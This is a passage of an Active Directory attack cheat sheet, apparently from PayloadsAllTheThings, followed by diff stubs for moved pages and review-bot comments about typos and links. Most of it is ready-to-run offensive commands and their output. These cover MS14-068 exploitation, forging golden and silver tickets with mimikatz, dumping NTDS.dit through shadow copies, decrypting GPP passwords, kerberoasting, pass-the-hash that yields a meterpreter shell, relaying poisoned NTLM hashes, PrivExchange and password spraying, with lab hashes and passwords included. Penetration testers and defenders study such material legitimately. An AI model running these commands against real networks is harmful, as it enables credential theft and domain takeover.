USER_SID S-1-5-21-297520375-2634728305-5197346142-1106 yes The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000
```
```powershell
# https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek
git clone https://github.com/SecWiki/windows-kernel-exploits
python ./ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr> -p <clearPassword>
python ./ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-2222329127-1110 -d adsdc02.lab.adsecurity.org
python ./ms14-068.py -u john.smith@pwn3d.local -s S-1-5-21-2923581646-3335815371-2872905324-1107 -d 192.168.115.10
```
Then use `mimikatz` to load the ticket.
```powershell
mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache"
```
:warning: If the clock is skewed use `clock-skew.nse` script from `nmap`
```powershell
$ nmap -sV -sC 10.10.10.10
clock-skew: mean: -1998d09h03m04s, deviation: 4h00m00s, median: -1998d11h03m05s
$ sudo date -s "14 APR 2015 18:25:16"
```
### Open Shares
```powershell
smbmap -H 10.10.10.10 # null session
smbmap -H 10.10.10.10 -R # recursive listing
smbmap -H 10.10.10.10 -u invaliduser # guest smb session
smbmap -H 10.10.10.10 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18
```
or
```powershell
pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share
pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/C$
ls # list files
cd # move inside a folder
get # download files
put # replace a file
```
or
```powershell
smbclient -I 10.10.10.100 -L ACTIVE -N -U ""
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
use Sharename # select a Sharename
cd Folder # move inside a folder
ls # list files
```
Download a folder recursively
```powershell
smbclient //10.0.0.1/Share
smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> lcd '/path/to/go/'
smb: \> mget *
```
Mount a share
```powershell
smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw
```
### GPO - Pivoting with Local Admin & Passwords in SYSVOL
:triangular_flag_on_post: GPO Priorization : Organization Unit > Domain > Site > Local
Find password in SYSVOL (MS14-025)
```powershell
findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
```
Decrypt a Group Policy Password found in SYSVOL (by [0x00C651E0](https://twitter.com/0x00C651E0/status/956362334682849280)), using the 32-byte AES key provided by Microsoft in the [MSDN - 2.2.1.1.4 Password Encryption](https://msdn.microsoft.com/en-us/library/cc422924.aspx)
```bash
echo 'password_in_base64' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000
e.g:
echo '5OPdEKwZSf7dYAvLOe6RzRDtcvT/wCP8g5RqmAgjSso=' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000
echo 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000
```
Metasploit modules to enumerate shares and credentials
```c
scanner/smb/smb_enumshares
post/windows/gather/enum_shares
post/windows/gather/credentials/gpp
```
Crackmapexec modules
```powershell
cme smb 192.168.1.2 -u Administrator -H 89[...]9d -M gpp_autologin
cme smb 192.168.1.2 -u Administrator -H 89[...]9d -M gpp_password
```
List all GPO for a domain
```powershell
Get-GPO -domaine DOMAIN.COM -all
Get-GPOReport -all -reporttype xml --all
Powersploit:
Get-NetGPO
Get-NetGPOGroup
```
### Dumping AD Domain Credentials (%SystemRoot%\NTDS\Ntds.dit)
#### Using ndtsutil
```powershell
C:\>ntdsutil
ntdsutil: activate instance ntds
ntdsutil: ifm
ifm: create full c:\pentest
ifm: quit
ntdsutil: quit
```
or
```powershell
ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q
```
#### Using Vshadow
```powershell
vssadmin create shadow /for=C :
Copy Shadow_Copy_Volume_Name\windows\ntds\ntds.dit c:\ntds.dit
```
You can also use the Nishang script, available at : [https://github.com/samratashok/nishang](https://github.com/samratashok/nishang)
```powershell
Import-Module .\Copy-VSS.ps1
Copy-VSS
Copy-VSS -DestinationDir C:\ShadowCopy\
```
#### Using vssadmin
```powershell
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ShadowCopy
```
#### Using DiskShadow (a Windows signed binary)
```powershell
diskshadow.txt contains :
set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% z:
exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit
delete shadows volume %someAlias%
reset
then:
NOTE - must be executed from C:\Windows\System32
diskshadow.exe /s c:\diskshadow.txt
dir c:\exfil
reg.exe save hklm\system c:\exfil\system.bak
```
#### Extract hashes from ntds.dit
then you need to use secretsdump to extract the hashes
```java
secretsdump.py -system /root/SYSTEM -ntds /root/ntds.dit LOCAL
```
secretsdump also works remotely
```java
./secretsdump.py -dc-ip IP AD\administrator@domain -use-vss
./secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1
```
#### Alternatives - modules
Metasploit modules
```c
windows/gather/credentials/domain_hashdump
```
PowerSploit module
```powershell
Invoke-NinjaCopy --path c:\windows\NTDS\ntds.dit --verbose --localdestination c:\ntds.dit
```
CrackMapExec module
```powershell
cme smb 10.10.0.202 -u username -p password --ntds vss
```
### Password in AD User comment
```powershell
enum4linux | grep -i desc
There are 3-4 fields that seem to be common in most AD schemas:
UserPassword, UnixUserPassword, unicodePwd and msSFU30Password.
Get-WmiObject -Class Win32_UserAccount -Filter "Domain='COMPANYDOMAIN' AND Disabled='False'" | Select Name, Domain, Status, LocalAccount, AccountType, Lockout, PasswordRequired,PasswordChangeable, Description, SID
```
or dump the Active Directory and `grep` the content.
```powershell
ldapdomaindump -u 'DOMAIN\john' -p MyP@ssW0rd 10.10.10.10 -o ~/Documents/AD_DUMP/
```
### PassTheTicket Golden Tickets
Forging a TGT require the krbtgt key
Mimikatz version
```powershell
Get info - Mimikatz
lsadump::dcsync /user:krbtgt
lsadump::lsa /inject /name:krbtgt
Forge a Golden ticket - Mimikatz
kerberos::purge
kerberos::golden /user:evil /domain:pentestlab.local /sid:S-1-5-21-3737340914-2019594255-2413685307 /krbtgt:d125e4f69c851529045ec95ca80fa37e /ticket:evil.tck /ptt
kerberos::tgt
```
Meterpreter version
```powershell
Get info - Meterpreter(kiwi)
dcsync_ntlm krbtgt
dcsync krbtgt
Forge a Golden ticket - Meterpreter
load kiwi
golden_ticket_create -d <domainname> -k <nthashof krbtgt> -s <SID without le RID> -u <user_for_the_ticket> -t <location_to_store_tck>
golden_ticket_create -d pentestlab.local -u pentestlabuser -s S-1-5-21-3737340914-2019594255-2413685307 -k d125e4f69c851529045ec95ca80fa37e -t /root/Downloads/pentestlabuser.tck
kerberos_ticket_purge
kerberos_ticket_use /root/Downloads/pentestlabuser.tck
kerberos_ticket_list
```
Using a ticket on Linux
```powershell
Convert the ticket kirbi to ccache with kekeo
misc::convert ccache ticket.kirbi
Alternatively you can use ticketer from Impacket
./ticketer.py -nthash a577fcf16cfef780a2ceb343ec39a0d9 -domain-sid S-1-5-21-2972629792-1506071460-1188933728 -domain amity.local mbrody-da
ticketer.py -nthash HASHKRBTGT -domain-sid SID_DOMAIN_A -domain DEV Administrator -extra-sid SID_DOMAIN_B_ENTERPRISE_519
./ticketer.py -nthash e65b41757ea496c2c60e82c05ba8b373 -domain-sid S-1-5-21-354401377-2576014548-1758765946 -domain DEV Administrator -extra-sid S-1-5-21-2992845451-2057077057-2526624608-519
export KRB5CCNAME=/home/user/ticket.ccache
cat $KRB5CCNAME
NOTE: You may need to comment the proxy_dns setting in the proxychains configuration file
./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100
```
### PassTheTicket Silver Tickets
Forging a TGS require machine accound password (key) from the KDC
```powershell
Create a ticket for the service
kerberos::golden /user:USERNAME /domain:DOMAIN.FQDN /sid:DOMAIN-SID /target:TARGET-HOST.DOMAIN.FQDN /rc4:TARGET-MACHINE-NT-HASH /service:SERVICE
/kerberos::golden /domain:adsec.local /user:ANY /sid:S-1-5-21-1423455951-1752654185-1824483205 /rc4:ceaxxxxxxxxxxxxxxxxxxxxxxxxxxxxx /target:DESKTOP-01.adsec.local /service:cifs /ptt
Then use the same steps as a Golden ticket
misc::convert ccache ticket.kirbi
export KRB5CCNAME=/home/user/ticket.ccache
./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100
```
### Trust Tickets
TODO
### Kerberoast
> "A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. " - [MSDN](https://docs.microsoft.com/fr-fr/windows/desktop/AD/service-principal-names)
Any valid domain user can request a kerberos ticket for any domain service with `GetUserSPNs`. Once the ticket is received, password cracking can be done offline on the ticket to attempt to break the password for whatever user the service is running as.
```powershell
$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon
-------------------- ------------- -------------------------------------------------------- ------------------- -------------------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 21:06:40 2018-12-03 17:11:11
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$424338c0a3c3af43c360c29c154b012c$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
```
Alternatively with [Rubeus](https://github.com/GhostPack/Rubeus)
```powershell
.\rubeus.exe kerberoast /creduser:DOMAIN\JOHN /credpassword:MyP@ssW0RD
```
Then crack the ticket with hashcat or john
```powershell
hashcat -m 13100 -a 0 hash.txt crackstation.txt
./john ~/hash.txt --wordlist=rockyou.lst
```
### KRB_AS_REP Roasting
If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting
```powershell
C:\>git clone https://github.com/GhostPack/Rubeus#asreproast
C:\Rubeus>Rubeus.exe asreproast /user:TestOU3user
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.4
[*] Action: AS-REP roasting
[*] Target User : TestOU3user
[*] Target Domain : testlab.local
[*] SamAccountName : TestOU3user
[*] DistinguishedName : CN=TestOU3user,OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local
[*] Using domain controller: testlab.local (192.168.52.100)
[*] Building AS-REQ (w/o preauth) for: 'testlab.local\TestOU3user'
[*] Connecting to 192.168.52.100:88
[*] Sent 169 bytes
[*] Received 1437 bytes
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:
$krb5asrep$TestOU3user@testlab.local:858B6F645D9F9B57210292E5711E0...(snip)...
```
### Pass-the-Hash
The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes.
```powershell
use exploit/windows/smb/psexec
set RHOST 10.2.0.3
set SMBUser jarrieta
set SMBPass nastyCutt3r
# NOTE1: The password can be replaced by a hash to execute a `pass the hash` attack.
# NOTE2: Require the full NTLM hash, you may need to add the "blank" LM (aad3b435b51404eeaad3b435b51404ee)
set PAYLOAD windows/meterpreter/bind_tcp
run
shell
or with crackmapexec
cme smb 10.2.0.2 -u jarrieta -H 'aad3b435b51404eeaad3b435b51404ee:489a04c09a5debbc9b975356693e179d' -x "whoami"
also works with net range : cme smb 10.2.0.2/24 ...
or with psexec
proxychains python ./psexec.py jarrieta@10.2.0.2 -hashes :489a04c09a5debbc9b975356693e179d
or with the builtin Windows RDP and mimikatz
sekurlsa::pth /user:<user name> /domain:<domain name> /ntlm:<the user's ntlm hash> /run:"mstsc.exe /restrictedadmin"
```
### OverPass-the-Hash (pass the key)
Request a TGT with only the NT hash
```powershell
Using impacket
./getTGT.py -hashes :1a59bd44fe5bec39c44c8cd3524dee lab.ropnop.com
chmod 600 tgwynn.ccache
also with the AES Key if you have it
./getTGT.py -aesKey xxxxxxxxxxxxxxkeyaesxxxxxxxxxxxxxxxx lab.ropnop.com
ktutil -k ~/mykeys add -p tgwynn@LAB.ROPNOP.COM -e arcfour-hma-md5 -w 1a59bd44fe5bec39c44c8cd3524dee --hex -V 5
kinit -t ~/mykers tgwynn@LAB.ROPNOP.COM
klist
```
### Capturing and cracking NTLMv2 hashes
If any user in the network tries to access a machine and mistype the IP or the name, Responder will answer for it and ask for the NTLMv2 hash to access the resource. Responder will poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network.
```python
python Responder.py -I eth0
```
Then crack the hash with `hashcat`
```powershell
hashcat -m 5600 -a 0 hash.txt crackstation.txt
```
### NTLMv2 hashes relaying
If a machine has `SMB signing`:`disabled`, it is possible to use Responder with Multirelay.py script to perform an `NTLMv2 hashes relay` and get a shell access on the machine.
1. Open the Responder.conf file and set the value of `SMB` and `HTTP` to `Off`.
2. Run `python RunFinger.py -i IP_Range` to detect machine with `SMB signing`:`disabled`.
3. Run `python Responder.py -I <interface_card>` and `python MultiRelay.py -t <target_machine_IP> -u ALL`
4. Wait for a shell
### Dangerous Built-in Groups Usage
AdminSDHolder
```powershell
Get-ADUser -LDAPFilter "(objectcategory=person)(samaccountname=*)(admincount=1)"
Get-ADGroup -LDAPFilter "(objectcategory=group) (admincount=1)"
or
([adsisearcher]"(AdminCount=1)").findall()
```
### Trust relationship between domains
```powershell
nltest /trusted_domains
```
or
```powershell
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
SourceName TargetName TrustType TrustDirection
---------- ---------- --------- --------------
domainA.local domainB.local TreeRoot Bidirectional
```
### PrivExchange attack
Exchange your privileges for Domain Admin privs by abusing Exchange.
You need a shell on a user account with a mailbox.
1. Subscription to the push notification feature (using privexchange.py or powerPriv), uses the credentials of the current user to authenticate to the Exchange server.
```bash
# https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py
python privexchange.py -ah xxxxxxx -u xxxx -d xxxxx
# https://github.com/G0ldenGunSec/PowerPriv
powerPriv -targetHost corpExch01 -attackerHost 192.168.1.17 -Version 2016
```
2. Relay of the Exchange server authentication and privilege escalation (using ntlmrelayx from Impacket).
3. Profit using secretdumps from Impacket, the user can now perform a dcsync and get another user's NTLM hash
```bash
python secretsdump.py xxxxxxxxxx -just-dc
```
Alternatively you can use the Metasploit module
[`use auxiliary/scanner/http/exchange_web_server_pushsubscription`](https://github.com/rapid7/metasploit-framework/pull/11420)
### Password spraying
Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password.
> The builtin Administrator account (RID:500) cannot be locked out of the system no matter how many failed logon attempts it accumulates.
Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
```powershell
root@kali:~$ ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt
root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123
```
Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network.
```powershell
crackmapexec smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)`
```
Using [RDPassSpray](https://github.com/xFreed0m/RDPassSpray) to target RDP services.
```powershell
python3 RDPassSpray.py -u [USERNAME] -p [PASSWORD] -d [DOMAIN] -t [TARGET IP]
```
Using [hydra]() and [ncrack]() to target RDP services.
```powershell
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://10.10.10.10
ncrack connection-limit 1 -vv --user administrator -P password-file.txt rdp://10.10.10.10
```
Most of the time the best passwords to spray are :
- Password1
- Welcome1
- $Companyname1
## References
* [https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html](https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html)
* [Roasting AS-REPs - January 17, 2017 - harmj0y](https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/)
* [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa)
* [Finding Passwords in SYSVOL & Exploiting Group Policy Preferences](https://adsecurity.org/?p=2288)
* [Golden ticket - Pentestlab](https://pentestlab.blog/2018/04/09/golden-ticket/)
* [Dumping Domain Password Hashes - Pentestlab](https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/)
* [Getting the goods with CrackMapExec: Part 1, by byt3bl33d3r](https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-1.html)
* [Getting the goods with CrackMapExec: Part 2, by byt3bl33d3r](https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-2.html)
* [Domain Penetration Testing: Using BloodHound, Crackmapexec, & Mimikatz to get Domain Admin](https://hausec.com/2017/10/21/domain-penetration-testing-using-bloodhound-crackmapexec-mimikatz-to-get-domain-admin/)
* [Pen Testing Active Directory Environments - Part I: Introduction to crackmapexec (and PowerView)](https://blog.varonis.com/pen-testing-active-directory-environments-part-introduction-crackmapexec-powerview/)
* [Pen Testing Active Directory Environments - Part II: Getting Stuff Done With PowerView](https://blog.varonis.com/pen-testing-active-directory-environments-part-ii-getting-stuff-done-with-powerview/)
* [Pen Testing Active Directory Environments - Part III: Chasing Power Users](https://blog.varonis.com/pen-testing-active-directory-environments-part-iii-chasing-power-users/)
* [Pen Testing Active Directory Environments - Part IV: Graph Fun](https://blog.varonis.com/pen-testing-active-directory-environments-part-iv-graph-fun/)
* [Pen Testing Active Directory Environments - Part V: Admins and Graphs](https://blog.varonis.com/pen-testing-active-directory-v-admins-graphs/)
* [Pen Testing Active Directory Environments - Part VI: The Final Case](https://blog.varonis.com/pen-testing-active-directory-part-vi-final-case/)
* [Passing the hash with native RDP client (mstsc.exe)](https://michael-eder.net/post/2018/native_rdp_pass_the_hash/)
* [Fun with LDAP, Kerberos (and MSRPC) in AD Environments](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments)
* [DiskShadow The return of VSS Evasion Persistence and AD DB extraction](https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/)
* [How To Pass the Ticket Through SSH Tunnels - bluescreenofjeff](https://bluescreenofjeff.com/2017-05-23-how-to-pass-the-ticket-through-ssh-tunnels/)
* [WONKACHALL AKERVA NDH2018 WRITE UP PART 1](https://akerva.com/blog/wonkachall-akerva-ndh-2018-write-up-part-1/)
* [WONKACHALL AKERVA NDH2018 WRITE UP PART 2](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-2/)
* [WONKACHALL AKERVA NDH2018 WRITE UP PART 3](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-3/)
* [WONKACHALL AKERVA NDH2018 WRITE UP PART 4](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-4/)
* [WONKACHALL AKERVA NDH2018 WRITE UP PART 5](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-5/)
* [BlueHat IL - Benjamin Delpy](https://microsoftrnd.co.il/Press%20Kit/BlueHat%20IL%20Decks/BenjaminDelpy.pdf)
* [Quick Guide to Installing Bloodhound in Kali-Rolling - James Smith](https://stealingthe.network/quick-guide-to-installing-bloodhound-in-kali-rolling/)
* [Using bloodhound to map the user network - Hausec](https://hausec.com/2017/10/26/using-bloodhound-to-map-the-user-network/)
* [Penetration Testing Active Directory, Part I - March 5, 2019 - Hausec](https://hausec.com/2019/03/05/penetration-testing-active-directory-part-i/)
* [Penetration Testing Active Directory, Part II - March 12, 2019 - Hausec](https://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/)
* [Abusing Kerberos: Kerberoasting - Haboob Team](https://www.exploit-db.com/docs/english/45051-abusing-kerberos---kerberoasting.pdf)
* [Invoke-Kerberoast - Powersploit Read the docs](https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/)
* [Kerberoasting - Part 1 - Mubix “Rob” Fuller](https://room362.com/post/2016/kerberoast-pt1/)
* [[PrivExchange] From user to domain admin in less than 60sec ! - davy](http://blog.randorisec.fr/privexchange-from-user-to-domain-admin-in-less-than-60sec/)
* [Abusing Exchange: One API call away from Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin)
* [Red Teaming Made Easy with Exchange Privilege Escalation and PowerPriv - Thursday, January 31, 2019 - Dave](http://blog.redxorblue.com/2019/01/red-teaming-made-easy-with-exchange.html)
* [Chump2Trump - AD Privesc talk at WAHCKon 2017 - @l0ss](https://github.com/l0ss/Chump2Trump/blob/master/ChumpToTrump.pdf)
* [Post-OSCP Series Part 2 - Kerberoasting - 16 APRIL 2019 - Jon Hickman](https://0metasecurity.com/post-oscp-part-2/)
* [WHATS SPECIAL ABOUT THE BUILTIN ADMINISTRATOR ACCOUNT? - 21/05/2012 - MORGAN SIMONSEN](https://morgansimonsen.com/2012/05/21/whats-special-about-the-builtin-administrator-account-12/)
* [Exploiting MS14-068 with PyKEK and Kali - 14 DEC 2014 - ZACH GRACE @ztgrace](https://zachgrace.com/posts/exploiting-ms14-068/)
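Review bot: several defects in the removed Active Directory block should not be carried over verbatim to the destination page. In the OverPass-the-Hash block the key file is `~/mykeys` on the `ktutil` line but `~/mykers` on the `kinit` line, and `-e arcfour-hma-md5` is misspelled (the enctype is `arcfour-hmac-md5`); the `getTGT.py -hashes :1a59bd44fe5bec39c44c8cd3524dee` value is 30 hex characters where an NT hash has 32. In the password-spraying paragraph `[hydra]()` and `[ncrack]()` are empty links, and `ncrack connection-limit 1` is missing the `--` of the option. The Pass-the-Hash, OverPass-the-Hash and `AdminSDHolder` fences also mix prose lines (`or with crackmapexec`, `Using impacket`, `also with the AES Key if you have it`, `or`) into command blocks, and the Responder invocation is fenced as `python` though it is a shell command; if these blocks survive on the moved page, put the prose outside the fence or comment it and tag the fences correctly.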

@@ -0,0 +1,13 @@
# Bind Shell
:warning: Content of this page has been moved to [InternalAllTheThings/cheatsheets/shell-bind](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/)
* [Perl](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/#perl)
* [Python](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/#python)
* [PHP](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/#php)
* [Ruby](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/#ruby)
* [Netcat Traditional](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/#netcat-traditional)
* [Netcat OpenBsd](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/#netcat-openbsd)
* [Ncat](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/#ncat)
* [Socat](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/#socat)
* [Powershell](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/#powershell)

@@ -0,0 +1,17 @@
# Cloud - AWS
:warning: Content of this page has been moved to [InternalAllTheThings/cloud/aws](https://github.com/swisskyrepo/InternalAllTheThings/)
* [Cloud - AWS](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/AWS%20Pentest/)
* [AWS - Access Token & Secrets](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-access-token/)
* [AWS - Service - Cognito](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-cognito/)
* [AWS - Service - DynamoDB](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-dynamodb/)
* [AWS - Service - EC2](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-ec2/)
* [AWS - Enumerate](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-enumeration/)
* [AWS - Identity & Access Management](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-iam/)
* [AWS - IOC & Detections](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-ioc-detection/)
* [AWS - Service - Lambda](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-lambda/)
* [AWS - Metadata SSRF](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-metadata/)
* [AWS - Service - S3 Buckets](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-s3-bucket/)
* [AWS - Service - SSM](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-ssm/)
* [AWS - Training](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-training/)
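Review bot: the `:warning:` line of the AWS stub points at the repository root (`https://github.com/swisskyrepo/InternalAllTheThings/`) while its link text promises `InternalAllTheThings/cloud/aws`; every other moved page in this change links straight to the destination page. Point it at the AWS page already listed on the next line, `https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/AWS%20Pentest/`, so the label and target agree.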

@@ -0,0 +1,12 @@
# Cloud - Azure
:warning: Content of this page has been moved to [InternalAllTheThings/cloud/azure](https://github.com/swisskyrepo/InternalAllTheThings/)
* [Azure AD Connect](https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-ad-connect/)
* [Azure AD Enumerate](https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-enumeration/)
* [Azure AD IAM](https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-devices-users-sp/)
* [Azure AD Phishing](https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-phishing/)
* [Azure AD Tokens](https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-access-and-token/)
* [Azure Persistence](https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-persistence/)
* [Azure Requirements](https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-requirements/)
* [Azure Services](https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-services/)
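Review bot: the `:warning:` line of the Azure stub has the same mismatch as the AWS one: the label says `InternalAllTheThings/cloud/azure` but the URL is the repository root. Link to the Azure section of the published site (the `https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/...` prefix used by the entries below) instead of the GitHub root.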

@@ -0,0 +1,32 @@
# Cobalt Strike
:warning: Content of this page has been moved to [InternalAllTheThings/command-control/cobalt-strike](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/)
* [Infrastructure](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#infrastructure)
* [Redirectors](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#redirectors)
* [Domain fronting](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#domain-fronting)
* [OpSec](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#opsec)
* [Customer ID](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#customer-id)
* [Payloads](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#payloads)
* [DNS Beacon](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#dns-beacon)
* [SMB Beacon](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#smb-beacon)
* [Metasploit compatibility](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#metasploit-compatibility)
* [Custom Payloads](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#custom-payloads)
* [Malleable C2](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#malleable-c2)
* [Files](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#files)
* [Powershell and .NET](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#powershell-and-net)
* [Powershell commabds](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#powershell-commands)
* [.NET remote execution](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#net-remote-execution)
* [Lateral Movement](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#lateral-movement)
* [VPN & Pivots](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#vpn--pivots)
* [Kits](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#kits)
* [Elevate Kit](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#elevate-kit)
* [Persistence Kit](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#persistence-kit)
* [Resource Kit](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#resource-kit)
* [Artifact Kit](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#artifact-kit)
